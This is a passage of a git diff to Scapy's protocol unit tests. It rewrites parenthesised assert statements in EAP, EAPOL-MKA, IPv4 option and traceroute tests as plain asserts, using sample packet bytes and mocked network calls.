-assert(eapol[MKAPDU][MKASAKUseParamSet].latest_key_key_server_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol.haslayer(MKALivePeerListParamSet)) -assert(eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol[MKAPDU].haslayer(MKAICVSet)) -assert(eapol[MKAPDU][MKAICVSet].icv == b"OF\x84\xf1@%\x95\xe6Fw9\x1a\xfa\x03(\xae") +assert eapol.version == 3 +assert eapol.type == 5 +assert eapol.len == 148 +assert eapol.haslayer(MKAPDU) +assert eapol[MKAPDU].basic_param_set.actor_member_id == b'\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7' +assert eapol.haslayer(MKASAKUseParamSet) +assert eapol[MKAPDU][MKASAKUseParamSet].latest_key_key_server_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6" +assert eapol.haslayer(MKALivePeerListParamSet) +assert eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6" +assert eapol[MKAPDU].haslayer(MKAICVSet) +assert eapol[MKAPDU][MKAICVSet].icv == b"OF\x84\xf1@%\x95\xe6Fw9\x1a\xfa\x03(\xae" = EAPOL-MKA - With Distributed SAK parameter set - Dissection eapol = None s = b"\x03\x05\x00\xb4\x01\x10\xe0<\xccN$\xc4\xf7\x7f\x00\x80q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x81\x00\x80\xc2\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x01\x00\x00\x10\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7\x00\x00\x00\x02\x03\x10\x00(q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x10\x00\x1c\x00\x00\x00\x01Cz\x05\x88\x9f\xe8-\x94W+?\x13~\xfb\x016yVB?\xbd\xa1\x9fu\xff\x00\x00\x10\xb0H\xcf\xe0:\xa1\x94RD'\x03\xe67\xe1Ur" eapol = EAPOL(s) -assert(eapol.version == 3) -assert(eapol.type == 5) -assert(eapol.len == 180) -assert(eapol.haslayer(MKAPDU)) -assert(eapol[MKAPDU].basic_param_set.actor_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol.haslayer(MKASAKUseParamSet)) -assert(eapol[MKAPDU][MKASAKUseParamSet].latest_key_key_server_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6") -assert(eapol.haslayer(MKALivePeerListParamSet)) -assert(eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7") -assert(eapol.haslayer(MKADistributedSAKParamSet)) -assert(eapol[MKADistributedSAKParamSet].sak_aes_key_wrap == b"Cz\x05\x88\x9f\xe8-\x94W+?\x13~\xfb\x016yVB?\xbd\xa1\x9fu") -assert(eapol[MKAPDU].haslayer(MKAICVSet)) -assert(eapol[MKAPDU][MKAICVSet].icv == b"\xb0H\xcf\xe0:\xa1\x94RD'\x03\xe67\xe1Ur") +assert eapol.version == 3 +assert eapol.type == 5 +assert eapol.len == 180 +assert eapol.haslayer(MKAPDU) +assert eapol[MKAPDU].basic_param_set.actor_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6" +assert eapol.haslayer(MKASAKUseParamSet) +assert eapol[MKAPDU][MKASAKUseParamSet].latest_key_key_server_member_id == b"q\x8b\x8a9\x86k/X\x14\xc9\xdc\xf6" +assert eapol.haslayer(MKALivePeerListParamSet) +assert eapol[MKAPDU][MKALivePeerListParamSet].member_id_message_num[0].member_id == b"\xbcj\x00\x96Ywz\x82:\x90\xd9\xe7" +assert eapol.haslayer(MKADistributedSAKParamSet) +assert eapol[MKADistributedSAKParamSet].sak_aes_key_wrap == b"Cz\x05\x88\x9f\xe8-\x94W+?\x13~\xfb\x016yVB?\xbd\xa1\x9fu" +assert eapol[MKAPDU].haslayer(MKAICVSet) +assert eapol[MKAPDU][MKAICVSet].icv == b"\xb0H\xcf\xe0:\xa1\x94RD'\x03\xe67\xe1Ur" ############ @@ -150,94 +150,94 @@ raw(EAP(code=2, type=3, desired_auth_types=[13,21,25,43])) == b'\x02\x00\x00\t\x = EAP - Dissection (1) s = b'\x01\x01\x00\x05\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' eap = EAP(s) -assert(eap.code == 1) -assert(eap.id == 1) -assert(eap.len == 5) -assert(hasattr(eap, "type")) -assert(eap.type == 1) +assert eap.code == 1 +assert eap.id == 1 +assert eap.len == 5 +assert hasattr(eap, "type") +assert eap.type == 1 = EAP - Dissection (2) s = b'\x02\x01\x00\x0e\x01anonymous\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 1) -assert(eap.len == 14) -assert(eap.type == 1) -assert(hasattr(eap, 'identity')) -assert(eap.identity == b'anonymous') +assert eap.code == 2 +assert eap.id == 1 +assert eap.len == 14 +assert eap.type == 1 +assert hasattr(eap, 'identity') +assert eap.identity == b'anonymous' = EAP - Dissection (3) s = b'\x01\x01\x00\x06\r ' eap = EAP(s) -assert(eap.code == 1) -assert(eap.id == 1) -assert(eap.len == 6) -assert(eap.type == 13) -assert(eap.haslayer(EAP_TLS)) -assert(eap[EAP_TLS].L == 0) -assert(eap[EAP_TLS].M == 0) -assert(eap[EAP_TLS].S == 1) +assert eap.code == 1 +assert eap.id == 1 +assert eap.len == 6 +assert eap.type == 13 +assert eap.haslayer(EAP_TLS) +assert eap[EAP_TLS].L == 0 +assert eap[EAP_TLS].M == 0 +assert eap[EAP_TLS].S == 1 = EAP - Dissection (4) s = b'\x02\x01\x00\xd1\r\x00\x16\x03\x01\x00\xc6\x01\x00\x00\xc2\x03\x01UK\x02\xdf\x1e\xde5\xab\xfa[\x15\xef\xbe\xa2\xe4`\xc6g\xb9\xa8\xaa%vAs\xb2\x1cXt\x1c0\xb7\x00\x00P\xc0\x14\xc0\n\x009\x008\x00\x88\x00\x87\xc0\x0f\xc0\x05\x005\x00\x84\xc0\x12\xc0\x08\x00\x16\x00\x13\xc0\r\xc0\x03\x00\n\xc0\x13\xc0\t\x003\x002\x00\x9a\x00\x99\x00E\x00D\xc0\x0e\xc0\x04\x00/\x00\x96\x00A\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05\x00\x04\x00\x15\x00\x12\x00\t\x00\xff\x01\x00\x00I\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x004\x002\x00\x0e\x00\r\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\t\x00\n\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00#\x00\x00\x00\x0f\x00\x01\x01' eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 1) -assert(eap.len == 209) -assert(eap.type == 13) -assert(eap.haslayer(EAP_TLS)) -assert(eap[EAP_TLS].L == 0) -assert(eap[EAP_TLS].M == 0) -assert(eap[EAP_TLS].S == 0) +assert eap.code == 2 +assert eap.id == 1 +assert eap.len == 209 +assert eap.type == 13 +assert eap.haslayer(EAP_TLS) +assert eap[EAP_TLS].L == 0 +assert eap[EAP_TLS].M == 0 +assert eap[EAP_TLS].S == 0 = EAP - Dissection (5) s = b'\x02\x9e\x00<+\x01\x16\x03\x01\x001\x01\x00\x00-\x03\x01dr1\x93ZS\x0en\xad\x1f\xbaH\xbb\xfe6\xe6\xd0\xcb\xec\xd7\xc0\xd7\xb9\xa5\xc9\x0c\xfd\x98o\xa7T \x00\x00\x04\x004\x00\x00\x01\x00\x00\x00' eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 158) -assert(eap.len == 60) -assert(eap.type == 43) -assert(eap.haslayer(EAP_FAST)) -assert(eap[EAP_FAST].L == 0) -assert(eap[EAP_FAST].M == 0) -assert(eap[EAP_FAST].S == 0) -assert(eap[EAP_FAST].version == 1) +assert eap.code == 2 +assert eap.id == 158 +assert eap.len == 60 +assert eap.type == 43 +assert eap.haslayer(EAP_FAST) +assert eap[EAP_FAST].L == 0 +assert eap[EAP_FAST].M == 0 +assert eap[EAP_FAST].S == 0 +assert eap[EAP_FAST].version == 1 = EAP - Dissection (6) s = b'\x02\x9f\x01L+\x01\x16\x03\x01\x01\x06\x10\x00\x01\x02\x01\x00Y\xc9\x8a\tcw\t\xdcbU\xfd\x035\xcd\x1a\t\x10f&[(9\xf6\x88W`\xc6\x0f\xb3\x84\x15\x19\xf5\tk\xbd\x8fp&0\xb0\xa4B\x85\x0c<:s\xf2zT\xc3\xbd\x8a\xe4D{m\xe7\x97\xfe>\xda\x14\xb8T1{\xd7H\x9c\xa6\xcb\xe3,u\xdf\xe0\x82\xe5R\x1e<\xe5\x03}\xeb\x98\xe2\xf7\x8d3\xc6\x83\xac"\x8f\xd7\x12\xe5{:"\x84A\xd9\x14\xc2cZF\xd4\t\xab\xdar\xc7\xe0\x0e\x00o\xce\x05g\xdc?\xcc\xf7\xe83\x83E\xb3>\xe8<3-QB\xfd$C/\x1be\xcf\x03\xd6Q4\xbe\\h\xba)<\x99N\x89\xd9\xb1\xfa!\xd7a\xef\xa3\xd3o\xed8Uz\xb5k\xb0`\xfeC\xbc\xb3aS,d\xe6\xdc\x13\xa4A\x1e\x9b\r{\xd6s \xd0cQ\x95y\xc8\x1d\xc3\xd9\x87\xf2=\x81\x96q~\x99E\xc3\x97\xa8px\xe2\xc7\x92\xeb\xff/v\x84\x1e\xfb\x00\x95#\xba\xfb\xd88h\x90K\xa7\xbd9d\xb4\xf2\xf2\x14\x02vtW\xaa\xadY\x14\x03\x01\x00\x01\x01\x16\x03\x01\x000\x97\xc5l\xd6\xef\xffcM\x81\x90Q\x96\xf6\xfeX1\xf7\xfc\x84\xc6\xa0\xf6Z\xcd\xb6\xe1\xd4\xdb\x88\xf9t%Q!\xe7,~#2G-\xdf\x83\xbf\x86Q\xa2$' eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 159) -assert(eap.len == 332) -assert(eap.type == 43) -assert(eap.haslayer(EAP_FAST)) -assert(eap[EAP_FAST].L == 0) -assert(eap[EAP_FAST].M == 0) -assert(eap[EAP_FAST].S == 0) -assert(eap[EAP_FAST].version == 1) +assert eap.code == 2 +assert eap.id == 159 +assert eap.len == 332 +assert eap.type == 43 +assert eap.haslayer(EAP_FAST) +assert eap[EAP_FAST].L == 0 +assert eap[EAP_FAST].M == 0 +assert eap[EAP_FAST].S == 0 +assert eap[EAP_FAST].version == 1 = EAP - Dissection (7) s = b'\x02\xf1\x00\t\x03\r\x15\x19+' eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 241) -assert(eap.len == 9) -assert(eap.type == 3) -assert(hasattr(eap, 'desired_auth_types')) -assert(eap.desired_auth_types == [13,21,25,43]) +assert eap.code == 2 +assert eap.id == 241 +assert eap.len == 9 +assert eap.type == 3 +assert hasattr(eap, 'desired_auth_types') +assert eap.desired_auth_types == [13,21,25,43] = EAP - Dissection (8) s = b"\x02\x03\x01\x15\x15\x00\x16\x03\x01\x01\n\x01\x00\x01\x06\x03\x03\xd5\xd9\xd5rT\x9e\xb8\xbe,>\xcf!\xcf\xc7\x02\x8c\xb1\x1e^F\xf7\xc84\x8c\x01t4\x91[\x02\xc8/\x00\x00\x8c\xc00\xc0,\xc0(\xc0$\xc0\x14\xc0\n\x00\xa5\x00\xa3\x00\xa1\x00\x9f\x00k\x00j\x00i\x00h\x009\x008\x007\x006\x00\x88\x00\x87\x00\x86\x00\x85\xc02\xc0.\xc0*\xc0&\xc0\x0f\xc0\x05\x00\x9d\x00=\x005\x00\x84\xc0/\xc0+\xc0'\xc0#\xc0\x13\xc0\t\x00\xa4\x00\xa2\x00\xa0\x00\x9e\x00g\x00@\x00?\x00>\x003\x002\x001\x000\x00\x9a\x00\x99\x00\x98\x00\x97\x00E\x00D\x00C\x00B\xc01\xc0-\xc0)\xc0%\xc0\x0e\xc0\x04\x00\x9c\x00<\x00/\x00\x96\x00A\x00\xff\x01\x00\x00Q\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x00\x1c\x00\x1a\x00\x17\x00\x19\x00\x1c\x00\x1b\x00\x18\x00\x1a\x00\x16\x00\x0e\x00\r\x00\x0b\x00\x0c\x00\t\x00\n\x00\r\x00 \x00\x1e\x06\x01\x06\x02\x06\x03\x05\x01\x05\x02\x05\x03\x04\x01\x04\x02\x04\x03\x03\x01\x03\x02\x03\x03\x02\x01\x02\x02\x02\x03\x00\x0f\x00\x01\x01" eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 3) -assert(eap.len == 277) -assert(eap.type == 21) -assert(eap.haslayer(EAP_TTLS)) -assert(eap[EAP_TTLS].L == 0) -assert(eap[EAP_TTLS].M == 0) -assert(eap[EAP_TTLS].S == 0) -assert(eap[EAP_TTLS].version == 0) +assert eap.code == 2 +assert eap.id == 3 +assert eap.len == 277 +assert eap.type == 21 +assert eap.haslayer(EAP_TTLS) +assert eap[EAP_TTLS].L == 0 +assert eap[EAP_TTLS].M == 0 +assert eap[EAP_TTLS].S == 0 +assert eap[EAP_TTLS].version == 0 = EAP - EAP_TLS - Basic Instantiation raw(EAP_TLS()) == b'\x01\x00\x00\x06\r\x00' @@ -257,26 +257,26 @@ raw(EAP_MD5()) == b'\x01\x00\x00\x06\x04\x00' = EAP - EAP_MD5 - Request - Dissection (8) s = b'\x01\x02\x00\x16\x04\x10\x86\xf9\x89\x94\x81\x01\xb3 nHh\x1b\x8d\xe7^\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' eap = EAP(s) -assert(eap.code == 1) -assert(eap.id == 2) -assert(eap.len == 22) -assert(eap.type == 4) -assert(eap.haslayer(EAP_MD5)) -assert(eap[EAP_MD5].value_size == 16) -assert(eap[EAP_MD5].value == b'\x86\xf9\x89\x94\x81\x01\xb3 nHh\x1b\x8d\xe7^\xdb') -assert(eap[EAP_MD5].optional_name == b'') +assert eap.code == 1 +assert eap.id == 2 +assert eap.len == 22 +assert eap.type == 4 +assert eap.haslayer(EAP_MD5) +assert eap[EAP_MD5].value_size == 16 +assert eap[EAP_MD5].value == b'\x86\xf9\x89\x94\x81\x01\xb3 nHh\x1b\x8d\xe7^\xdb' +assert eap[EAP_MD5].optional_name == b'' = EAP - EAP_MD5 - Response - Dissection (9) s = b'\x02\x02\x00\x16\x04\x10\xfd\x1e\xffe\xf5\x80y\xa8\xe3\xc8\xf1\xbd\xc2\x85\xae\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' eap = EAP(s) -assert(eap.code == 2) -assert(eap.id == 2) -assert(eap.len == 22) -assert(eap.type == 4) -assert(eap.haslayer(EAP_MD5)) -assert(eap[EAP_MD5].value_size == 16) -assert(eap[EAP_MD5].value == b'\xfd\x1e\xffe\xf5\x80y\xa8\xe3\xc8\xf1\xbd\xc2\x85\xae\xcf') -assert(eap[EAP_MD5].optional_name == b'') +assert eap.code == 2 +assert eap.id == 2 +assert eap.len == 22 +assert eap.type == 4 +assert eap.haslayer(EAP_MD5) +assert eap[EAP_MD5].value_size == 16 +assert eap[EAP_MD5].value == b'\xfd\x1e\xffe\xf5\x80y\xa8\xe3\xc8\xf1\xbd\xc2\x85\xae\xcf' +assert eap[EAP_MD5].optional_name == b'' = EAP - LEAP - Basic Instantiation raw(LEAP()) == b'\x01\x00\x00\x08\x11\x01\x00\x00' @@ -284,101 +284,101 @@ raw(LEAP()) == b'\x01\x00\x00\x08\x11\x01\x00\x00' = EAP - LEAP - Request - Dissection (10) s = b'\x01D\x00\x1c\x11\x01\x00\x088\xb6\xd7\xa1E\x9a9\x8a[\x91\xe1U\xfa\xb6H\xd1\xbd\x9b\xd5\xadl\rV\x00\x00\x02\x00/\x01\x00' eap = EAP_PEAP(s) -assert(eap.code == 2) -assert(eap.id == 3) -assert(eap.len == 56) -assert(eap.type == 25) -assert(eap.haslayer(EAP_PEAP)) -assert(eap[EAP_PEAP].S == 0) -assert(eap[EAP_PEAP].version == 1) -assert(hasattr(eap[EAP_PEAP], "tls_data")) +assert eap.code == 2 +assert eap.id == 3 +assert eap.len == 56 +assert eap.type == 25 +assert eap.haslayer(EAP_PEAP) +assert eap[EAP_PEAP].S == 0 +assert eap[EAP_PEAP].version == 1 +assert hasattr(eap[EAP_PEAP], "tls_data") = EAP - Layers (1) eap = EAP_MD5() -assert(EAP_MD5 in eap) -assert(not EAP_TLS in eap) -assert(not EAP_FAST in eap) -assert(not LEAP in eap) -assert(EAP in eap) +assert EAP_MD5 in eap +assert not EAP_TLS in eap +assert not EAP_FAST in eap +assert not LEAP in eap +assert EAP in eap eap = EAP_TLS() -assert(EAP_TLS in eap) -assert(not EAP_MD5 in eap) -assert(not EAP_FAST in eap) -assert(not LEAP in eap) -assert(EAP in eap) +assert EAP_TLS in eap +assert not EAP_MD5 in eap +assert not EAP_FAST in eap +assert not LEAP in eap +assert EAP in eap eap = EAP_FAST() -assert(EAP_FAST in eap) -assert(not EAP_MD5 in eap) -assert(not EAP_TLS in eap) -assert(not LEAP in eap) -assert(EAP in eap) +assert EAP_FAST in eap +assert not EAP_MD5 in eap +assert not EAP_TLS in eap +assert not LEAP in eap +assert EAP in eap eap = EAP_TTLS() -assert(EAP_TTLS in eap) -assert(not EAP_MD5 in eap) -assert(not EAP_TLS in eap) -assert(not EAP_FAST in eap) -assert(not LEAP in eap) -assert(EAP in eap) +assert EAP_TTLS in eap +assert not EAP_MD5 in eap +assert not EAP_TLS in eap +assert not EAP_FAST in eap +assert not LEAP in eap +assert EAP in eap eap = EAP_PEAP() -assert(EAP_PEAP in eap) -assert(EAP in eap) +assert EAP_PEAP in eap +assert EAP in eap eap = LEAP() -assert(not EAP_MD5 in eap) -assert(not EAP_TLS in eap) -assert(not EAP_FAST in eap) -assert(LEAP in eap) -assert(EAP in eap) +assert not EAP_MD5 in eap +assert not EAP_TLS in eap +assert not EAP_FAST in eap +assert LEAP in eap +assert EAP in eap = EAP - Layers (2) eap = EAP_MD5() -assert(type(eap[EAP]) == EAP_MD5) +assert type(eap[EAP]) == EAP_MD5 eap = EAP_TLS() -assert(type(eap[EAP]) == EAP_TLS) +assert type(eap[EAP]) == EAP_TLS eap = EAP_FAST() -assert(type(eap[EAP]) == EAP_FAST) +assert type(eap[EAP]) == EAP_FAST eap = EAP_TTLS() -assert(type(eap[EAP]) == EAP_TTLS) +assert type(eap[EAP]) == EAP_TTLS eap = EAP_PEAP() -assert(type(eap[EAP]) == EAP_PEAP) +assert type(eap[EAP]) == EAP_PEAP eap = LEAP() -assert(type(eap[EAP]) == LEAP) +assert type(eap[EAP]) == LEAP = EAP - sessions (1) p = IP()/TCP()/EAP() diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index 45455e0a681..6a3a0c7628c 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -8,60 +8,60 @@ ~ IP options r = raw(IPOption()) r -assert(r == b'\x00\x02') +assert r == b'\x00\x02' r = raw(IPOption_NOP()) r -assert(r == b'\x01') +assert r == b'\x01' r = raw(IPOption_EOL()) r -assert(r == b'\x00') +assert r == b'\x00' r = raw(IPOption_LSRR(routers=["1.2.3.4","5.6.7.8"])) r -assert(r == b'\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08') +assert r == b'\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08' r = raw(IPOption_Timestamp(internet_address='192.168.15.7', timestamp=11223344)) r -assert(r == b'D\x0c\t\x01\xc0\xa8\x0f\x07\x00\xabA0') +assert r == b'D\x0c\t\x01\xc0\xa8\x0f\x07\x00\xabA0' r = raw(IPOption_Timestamp(flg=0, length=8)) r -assert(r == b'D\x08\t\x00\x00\x00\x00\x00') +assert r == b'D\x08\t\x00\x00\x00\x00\x00' = IP options individual dissection ~ IP options io = IPOption(b"\x00") io -assert(io.option == 0 and isinstance(io, IPOption_EOL)) +assert io.option == 0 and isinstance(io, IPOption_EOL) io = IPOption(b"\x01") io -assert(io.option == 1 and isinstance(io, IPOption_NOP)) +assert io.option == 1 and isinstance(io, IPOption_NOP) lsrr=b'\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08' p=IPOption_LSRR(lsrr) p q=IPOption(lsrr) q -assert(p == q) +assert p == q = IP assembly and dissection with options ~ IP options p = IP(src="9.10.11.12",dst="13.14.15.16",options=IPOption_SDBM(addresses=["1.2.3.4","5.6.7.8"]))/TCP() r = raw(p) r -assert(r == b'H\x00\x004\x00\x01\x00\x00@\x06\xa2q\t\n\x0b\x0c\r\x0e\x0f\x10\x95\n\x01\x02\x03\x04\x05\x06\x07\x08\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00_K\x00\x00') +assert r == b'H\x00\x004\x00\x01\x00\x00@\x06\xa2q\t\n\x0b\x0c\r\x0e\x0f\x10\x95\n\x01\x02\x03\x04\x05\x06\x07\x08\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00_K\x00\x00' q=IP(r) q -assert( isinstance(q.options[0],IPOption_SDBM) ) -assert( q[IPOption_SDBM].addresses[1] == "5.6.7.8" ) +assert isinstance(q.options[0],IPOption_SDBM) +assert q[IPOption_SDBM].addresses[1] == "5.6.7.8" p.options[0].addresses[0] = '5.6.7.8' -assert( IP(raw(p)).options[0].addresses[0] == '5.6.7.8' ) +assert IP(raw(p)).options[0].addresses[0] == '5.6.7.8' p = IP(src="9.10.11.12", dst="13.14.15.16", options=[IPOption_NOP(),IPOption_LSRR(routers=["1.2.3.4","5.6.7.8"]),IPOption_Security(transmission_control_code="XYZ")])/TCP() p r = raw(p) r -assert(r == b'K\x00\x00@\x00\x01\x00\x00@\x06\xf3\x83\t\n\x0b\x0c\r\x0e\x0f\x10\x01\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08\x82\x0b\x00\x00\x00\x00\x00\x00XYZ\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00o[\x00\x00') +assert r == b'K\x00\x00@\x00\x01\x00\x00@\x06\xf3\x83\t\n\x0b\x0c\r\x0e\x0f\x10\x01\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08\x82\x0b\x00\x00\x00\x00\x00\x00XYZ\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00o[\x00\x00' q = IP(r) q -assert(q[IPOption_LSRR].get_current_router() == "1.2.3.4") -assert(q[IPOption_Security].transmission_control_code == b"XYZ") -assert(q[TCP].flags == 2) +assert q[IPOption_LSRR].get_current_router() == "1.2.3.4" +assert q[IPOption_Security].transmission_control_code == b"XYZ" +assert q[TCP].flags == 2 ############ @@ -496,16 +496,16 @@ answer = IP(dst="192.168.0.254", src="192.168.0.2", ttl=1)/ICMP()/IPerror(dst="1 query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/UDP()/DNS() answer = IP(dst="192.168.0.254", src="192.168.0.2")/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/UDPerror()/DNS() -assert(answer.answers(query) == True) +assert answer.answers(query) == True query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/TCP() answer = IP(dst="192.168.0.254", src="192.168.0.2")/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/TCPerror() -assert(answer.answers(query) == True) +assert answer.answers(query) == True query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/ICMP()/"scapy" answer = IP(dst="192.168.0.254", src="192.168.0.2")/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/ICMPerror()/"scapy" -assert(answer.answers(query) == True) +assert answer.answers(query) == True = IPv4 - mDNS a = IP(dst="224.0.0.251") @@ -515,9 +515,9 @@ assert a.hashret() == b"\x00" = IPv4 - utilities l = overlap_frag(IP(dst="1.2.3.4")/ICMP()/("AB"*8), ICMP()/("CD"*8)) -assert(len(l) == 6) -assert([len(raw(p[IP].payload)) for p in l] == [8, 8, 8, 8, 8, 8]) -assert([(p.frag, p.flags.MF) for p in [IP(raw(p)) for p in l]] == [(0, True), (1, True), (2, True), (0, True), (1, True), (2, False)]) +assert len(l) == 6 +assert [len(raw(p[IP].payload)) for p in l] == [8, 8, 8, 8, 8, 8] +assert [(p.frag, p.flags.MF) for p in [IP(raw(p)) for p in l]] == [(0, True), (1, True), (2, True), (0, True), (1, True), (2, False)] = IPv4 - ICMP hashret for x in ICMP(type=range(0,40),code=range(0,40)): @@ -531,7 +531,7 @@ tr_packets = [ (IP(dst="192.168.0.1", src="192.168.0.254", ttl=ttl)/TCP(options= for (ip, ttl) in ip_ttl ] tr = TracerouteResult(tr_packets) -assert(tr.get_trace() == {'192.168.0.1': {1: ('192.168.0.1', False), 2: ('192.168.0.2', False), 3: ('192.168.0.3', False), 4: ('192.168.0.4', False), 5: ('192.168.0.5', False), 6: ('192.168.0.6', False), 7: ('192.168.0.7', False), 8: ('192.168.0.8', False), 9: ('192.168.0.9', False)}}) +assert tr.get_trace() == {'192.168.0.1': {1: ('192.168.0.1', False), 2: ('192.168.0.2', False), 3: ('192.168.0.3', False), 4: ('192.168.0.4', False), 5: ('192.168.0.5', False), 6: ('192.168.0.6', False), 7: ('192.168.0.7', False), 8: ('192.168.0.8', False), 9: ('192.168.0.9', False)}} def test_show(): with ContextManagerCaptureOutput() as cmco: @@ -550,7 +550,7 @@ def test_show(): expected += "9 192.168.0.9 11 \n" index_result = result_show.index("\n1") index_expected = expected.index("\n1") - assert(result_show[index_result:] == expected[index_expected:]) + assert result_show[index_result:] == expected[index_expected:] test_show() @@ -559,7 +559,7 @@ def test_summary(): tr = TracerouteResult(tr_packets) tr.summary() result_summary = cmco.get_output() - assert(len(result_summary.split('\n')) == 10) + assert len(result_summary.split('\n')) == 10 assert(any( "IP / TCP 192.168.0.254:%s > 192.168.0.1:%s S / Raw ==> " "IP / ICMP 192.168.0.9 > 192.168.0.254 time-exceeded " @@ -581,8 +581,8 @@ def test_timeskew_graph(mock_plt): mock_plt.plot = fake_plot srl = SndRcvList([(a, a) for a in [IP(raw(p[0])) for p in tr_packets]]) ret = srl.timeskew_graph("192.168.0.254") - assert(len(ret) == 9) - assert(ret[0][1] == 0.0) + assert len(ret) == 9 + assert ret[0][1] == 0.0 test_timeskew_graph() @@ -590,22 +590,22 @@ tr = TracerouteResult(tr_packets) saved_AS_resolver = conf.AS_resolver conf.AS_resolver = None tr.make_graph() -assert(len(tr.graphdef) == 491) +assert len(tr.graphdef) == 491 tr.graphdef.startswith("digraph trace {") == True -assert(('"192.168.0.9" ->' in tr.graphdef) == True) +assert ('"192.168.0.9" ->' in tr.graphdef) == True conf.AS_resolver = conf.AS_resolver pl = PacketList(list([Ether()/x for x in itertools.chain(*tr_packets)])) srl, ul = pl.sr() -assert(len(srl) == 9 and len(ul) == 0) +assert len(srl) == 9 and len(ul) == 0 conf_color_theme = conf.color_theme conf.color_theme = BlackAndWhite() -assert(len(pl.sessions().keys()) == 10) +assert len(pl.sessions().keys()) == 10 conf.color_theme = conf_color_theme new_pl = pl.replace(IP.src, "192.168.0.254", "192.168.0.42") -assert("192.168.0.254" not in [p[IP].src for p in new_pl]) +assert "192.168.0.254" not in [p[IP].src for p in new_pl] = IPv4 - reporting ~ netaccess @@ -620,7 +620,7 @@ def test_report_ports(mock_sr): (IP()/TCP(dport=65083, flags="S"), IP()/TCP(sport=65083, flags="R"))], [IP()/TCP(dport=65084, flags="S")] mock_sr.side_effect = sr report = "\\begin{tabular}{|r|l|l|}\n\\hline\n65081 & open & SA \\\\\n\\hline\n?? & closed & ICMP type dest-unreach/host-unreachable from 127.0.0.1 \\\\\n65083 & closed & TCP R \\\\\n\\hline\n65084 & ? & unanswered \\\\\n\\hline\n\\end{tabular}\n" - assert(report_ports("www.secdev.org", [65081,65082,65083,65084]) == report) + assert report_ports("www.secdev.org", [65081,65082,65083,65084]) == report test_report_ports() @@ -630,7 +630,7 @@ def test_IPID_count(): IPID_count([(IP()/UDP(), IP(id=random.randint(0, 65535))/UDP()) for i in range(3)]) result_IPID_count = cmco.get_output() lines = result_IPID_count.split("\n") - assert(len(lines) == 5) + assert len(lines) == 5 assert(lines[0] in ["Probably 3 classes: [4613, 53881, 58437]", "Probably 3 classes: [9103, 9227, 46399]"]) diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index adaab6343ac..6c58051c759 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -80,20 +80,20 @@ raw(IPv6(src="2048::deca", dst="2047::cafe")/IPv6ExtHdrRouting(addresses=["2001: = IPv6ExtHdrSegmentRouting Class - default - build & dissect s 